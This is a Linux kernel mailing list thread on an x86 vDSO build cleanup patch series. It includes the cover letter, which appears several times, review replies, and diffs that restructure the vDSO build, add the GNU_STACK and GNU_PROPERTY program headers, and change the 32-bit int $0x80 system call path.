- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
On Wed, Dec 17, 2025 at 9:16 PM Brian Gerst <brgerst@gmail.com> wrote:
Digging into the binutils source, PT_GNU_EH_FRAME and PT_GNU_STACK
were added to the parser around bintils-2.15. PT_GNU_PROPERTY was
added in binutils-2.38, which is newer than the minimum supported
version of binutils-2.30.
Probably better to just leave them then.
Brian Gerst
|
{
"author": "Brian Gerst <brgerst@gmail.com>",
"date": "Thu, 18 Dec 2025 01:56:49 -0500",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
On Tue, Dec 16, 2025 at 10:26 PM H. Peter Anvin <hpa@zytor.com> wrote:
Acked-by: Uros Bizjak <ubizjak@gmail.com>
|
{
"author": "Uros Bizjak <ubizjak@gmail.com>",
"date": "Tue, 6 Jan 2026 19:09:48 +0100",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
When neither sysenter32 nor syscall32 is available (on either
FRED-capable 64-bit hardware or old 32-bit hardware), there is no
reason to do a bunch of stack shuffling in __kernel_vsyscall.
Unfortunately, just overwriting the initial "push" instructions will
mess up the CFI annotations, so suffer the 3-byte NOP if not
applicable.
Similarly, inline the int $0x80 when doing inline system calls in the
vdso instead of calling __kernel_vsyscall.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vdso32/system_call.S | 18 ++++++++++++++----
arch/x86/include/asm/vdso/sys_call.h | 4 +++-
2 files changed, 17 insertions(+), 5 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index 7b1c0f16e511..9157cf9c5749 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -14,6 +14,18 @@
ALIGN
__kernel_vsyscall:
CFI_STARTPROC
+
+ /*
+ * If using int $0x80, there is no reason to muck about with the
+ * stack here. Unfortunately just overwriting the push instructions
+ * would mess up the CFI annotations, but it is only a 3-byte
+ * NOP in that case. This could be avoided by patching the
+ * vdso symbol table (not the code) and entry point, but that
+ * would a fair bit of tooling work or by simply compiling
+ * two different vDSO images, but that doesn't seem worth it.
+ */
+ ALTERNATIVE "int $0x80; ret", "", X86_FEATURE_SYSFAST32
+
/*
* Reshuffle regs so that all of any of the entry instructions
* will preserve enough state.
@@ -52,11 +64,9 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
- /* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
- ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSFAST32, \
- SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
+ ALTERNATIVE SYSENTER_SEQUENCE, SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
- /* Enter using int $0x80 */
+ /* Re-enter using int $0x80 */
int $0x80
SYM_INNER_LABEL(int80_landing_pad, SYM_L_GLOBAL)
diff --git a/arch/x86/include/asm/vdso/sys_call.h b/arch/x86/include/asm/vdso/sys_call.h
index dcfd17c6dd57..5806b1cd6aef 100644
--- a/arch/x86/include/asm/vdso/sys_call.h
+++ b/arch/x86/include/asm/vdso/sys_call.h
@@ -20,7 +20,9 @@
# define __sys_reg4 "r10"
# define __sys_reg5 "r8"
#else
-# define __sys_instr "call __kernel_vsyscall"
+# define __sys_instr ALTERNATIVE("ds;ds;ds;int $0x80", \
+ "call __kernel_vsyscall", \
+ X86_FEATURE_SYSFAST32)
# define __sys_clobber "memory"
# define __sys_nr(x,y) __NR_ ## x ## y
# define __sys_reg1 "ebx"
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:43 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
Currently the vdso doesn't include .note.gnu.property or a GNU noexec
stack annotation (the -z noexecstack in the linker script is
ineffective because we specify PHDRs explicitly.)
The motivation is that the dynamic linker currently do not check
these.
However, this is a weak excuse: the vdso*.so are also supposed to be
usable at link libraries, and there is no reason why the dynamic
linker might not want or need to check these in the future, so add
them back in -- it is trivial enough.
Use symbolic constants for the PHDR permission flags.
[ v4: drop unrelated formatting changes ]
[ v4.1: drop one last bogus formatting change (Brian Gerst) ]
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/common/vdso-layout.lds.S | 36 ++++++++++++--------
1 file changed, 22 insertions(+), 14 deletions(-)
diff --git a/arch/x86/entry/vdso/common/vdso-layout.lds.S b/arch/x86/entry/vdso/common/vdso-layout.lds.S
index ec1ac191a057..f050fd723712 100644
--- a/arch/x86/entry/vdso/common/vdso-layout.lds.S
+++ b/arch/x86/entry/vdso/common/vdso-layout.lds.S
@@ -47,18 +47,18 @@ SECTIONS
*(.gnu.linkonce.b.*)
} :text
- /*
- * Discard .note.gnu.property sections which are unused and have
- * different alignment requirement from vDSO note sections.
- */
- /DISCARD/ : {
+ .note.gnu.property : {
*(.note.gnu.property)
- }
- .note : { *(.note.*) } :text :note
-
- .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
- .eh_frame : { KEEP (*(.eh_frame)) } :text
+ } :text :note :gnu_property
+ .note : {
+ *(.note*)
+ } :text :note
+ .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
+ .eh_frame : {
+ KEEP (*(.eh_frame))
+ *(.eh_frame.*)
+ } :text
/*
* Text is well-separated from actual data: there's plenty of
@@ -87,15 +87,23 @@ SECTIONS
* Very old versions of ld do not recognize this name token; use the constant.
*/
#define PT_GNU_EH_FRAME 0x6474e550
+#define PT_GNU_STACK 0x6474e551
+#define PT_GNU_PROPERTY 0x6474e553
/*
* We must supply the ELF program headers explicitly to get just one
* PT_LOAD segment, and set the flags explicitly to make segments read-only.
*/
+#define PF_R FLAGS(4)
+#define PF_RW FLAGS(6)
+#define PF_RX FLAGS(5)
+
PHDRS
{
- text PT_LOAD FLAGS(5) FILEHDR PHDRS; /* PF_R|PF_X */
- dynamic PT_DYNAMIC FLAGS(4); /* PF_R */
- note PT_NOTE FLAGS(4); /* PF_R */
- eh_frame_hdr PT_GNU_EH_FRAME;
+ text PT_LOAD PF_RX FILEHDR PHDRS;
+ dynamic PT_DYNAMIC PF_R;
+ note PT_NOTE PF_R;
+ eh_frame_hdr PT_GNU_EH_FRAME PF_R;
+ gnu_stack PT_GNU_STACK PF_RW;
+ gnu_property PT_GNU_PROPERTY PF_R;
}
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:40 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
In most cases, the use of "fast 32-bit system call" depends either on
X86_FEATURE_SEP or X86_FEATURE_SYSENTER32 || X86_FEATURE_SYSCALL32.
However, nearly all the logic for both is identical.
Define X86_FEATURE_SYSFAST32 which indicates that *either* SYSENTER32 or
SYSCALL32 should be used, for either 32- or 64-bit kernels. This
defaults to SYSENTER; use SYSCALL if the SYSCALL32 bit is also set.
As this removes ALL existing uses of X86_FEATURE_SYSENTER32, which is
a kernel-only synthetic feature bit, simply remove it and replace it
with X86_FEATURE_SYSFAST32.
This leaves an unused alternative for a true 32-bit kernel, but that
should really not matter in any way.
The clearing of X86_FEATURE_SYSCALL32 can be removed once the patches
for automatically clearing disabled features has been merged.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/Kconfig.cpufeatures | 8 +++++++
arch/x86/entry/vdso/vdso32/system_call.S | 8 ++-----
arch/x86/include/asm/cpufeatures.h | 2 +-
